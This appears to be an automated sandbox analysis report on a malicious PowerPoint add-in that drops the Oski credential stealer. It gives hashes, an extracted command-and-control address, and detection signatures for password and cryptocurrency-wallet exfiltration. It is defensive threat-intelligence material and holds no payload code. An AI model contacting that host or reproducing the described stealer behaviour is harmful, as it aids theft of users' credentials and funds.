General
-
Target
Rfq Proforma Invoice 865678.ppam
-
Size
21KB
-
Sample
210810-4gr7jesxxa
-
MD5
2377c2fb68272650616d78bd7a3ed3f9
-
SHA1
20eaa630d4eb06ae9385b5d46ab0d54180dc43e4
-
SHA256
258a576bd9abba2c1366f3124d808529a0232f61619f455d2277546172dec5d2
-
SHA512
eafa5c07af843aeab33462dbe4171113eb6b6eec78e30997fc15409a180171b91292d02f74f5dd8c707cae58c6a9e9d2df4d4795621ee3e108686fc94f90b1e7
Static task
static1
Behavioral task
behavioral1
Sample
Rfq Proforma Invoice 865678.ppam
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Rfq Proforma Invoice 865678.ppam
Resource
win10v20210410
Malware Config
Extracted
oski
tunqyuindia.com/mar3/
Targets
-
-
Target
Rfq Proforma Invoice 865678.ppam
-
Size
21KB
-
MD5
2377c2fb68272650616d78bd7a3ed3f9
-
SHA1
20eaa630d4eb06ae9385b5d46ab0d54180dc43e4
-
SHA256
258a576bd9abba2c1366f3124d808529a0232f61619f455d2277546172dec5d2
-
SHA512
eafa5c07af843aeab33462dbe4171113eb6b6eec78e30997fc15409a180171b91292d02f74f5dd8c707cae58c6a9e9d2df4d4795621ee3e108686fc94f90b1e7
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Downloads MZ/PE file
-
Loads dropped DLL
-
Accesses cryptocurrency files/wallets, possible credential harvesting
-
Suspicious use of SetThreadContext
-